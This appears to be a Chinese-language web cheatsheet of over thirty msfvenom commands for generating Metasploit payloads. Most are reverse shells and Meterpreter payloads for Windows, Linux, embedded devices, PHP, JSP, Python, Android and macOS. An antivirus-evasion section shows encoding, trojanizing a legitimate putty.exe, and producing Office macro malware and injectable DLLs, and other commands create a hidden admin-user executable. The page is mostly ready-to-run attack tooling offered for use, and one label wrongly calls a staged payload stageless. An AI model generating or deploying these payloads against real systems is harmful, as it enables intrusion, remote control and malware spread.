Msfvenom Cheatsheet

精选 50+ 条 Metasploit 框架下的 Payload 生成命令,涵盖各种平台与高级绕过技巧。

基础查询 (Query)

列出所有可用 Payload
msfvenom -l payloads
已复制到剪贴板
列出所有编码器 (Encoders)
msfvenom -l encoders
已复制到剪贴板
列出所有支持的输出格式
msfvenom -l formats
已复制到剪贴板
列出所有支持的平台
msfvenom -l platforms
已复制到剪贴板
查看特定 Payload 的详细配置参数
msfvenom -p <payload> --list-options
已复制到剪贴板
查看完整帮助信息
msfvenom --help
已复制到剪贴板

Windows 常用反弹壳

经典 x86 Stageless Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
已复制到剪贴板
Windows x64 Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe
已复制到剪贴板
HTTPS 加密通道 (绕过流量审计)
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f exe > https.exe
已复制到剪贴板
普通 CMD 反弹 (体积小)
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
已复制到剪贴板
纯 PowerShell 反弹脚本
msfvenom -p windows/powershell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh > rev.ps1
已复制到剪贴板
使用 Shikata_ga_nai 编码 5 次
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe
已复制到剪贴板

Linux 常用反弹壳

Linux x86 Meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
已复制到剪贴板
Linux x64 Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell64.elf
已复制到剪贴板
Linux x64 普通 Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
已复制到剪贴板
ARM64 (树莓派/移动设备) Meterpreter
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板
MIPSLE (路由器/嵌入式) Meterpreter
msfvenom -p linux/mipsle/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板

脚本语言 / Web 壳

PHP Meterpreter (Web 上传)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
已复制到剪贴板
原生 PHP 反弹 Shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > rev.php
已复制到剪贴板
Java JSP 反弹 Shell (WAR 包)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
已复制到剪贴板
Python 反弹 Meterpreter
msfvenom -p python/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.py
已复制到剪贴板
Windows PowerShell 反弹 BAT
msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<PORT> -f raw > rev.bat
已复制到剪贴板

免杀与高级技巧

去除坏字符 (如空字节)
msfvenom ... -b '\x00\xff'
已复制到剪贴板
指定退出方式 (thread/process/seh)
msfvenom ... EXITFUNC=thread
已复制到剪贴板
绑定到现有可执行文件 (如 Putty)
msfvenom -p windows/meterpreter/reverse_tcp -x putty.exe -k -f exe > evil.exe
已复制到剪贴板
生成反射注入用的 DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > meter.dll
已复制到剪贴板
生成 Office 宏病毒 (VBA) 代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba
已复制到剪贴板
生成 C 语言格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c
已复制到剪贴板

其他实用 Payload

Android APK 控端
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o app.apk
已复制到剪贴板
MacOS Mach-O 反弹 Meterpreter
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho
已复制到剪贴板
Windows 添加管理员用户
msfvenom -p windows/adduser USER=admin PASS=123456 -f exe > adduser.exe
已复制到剪贴板
测试用的消息弹窗 Payload
msfvenom -p windows/messagebox TEXT="Hacked!" -f exe > msg.exe
已复制到剪贴板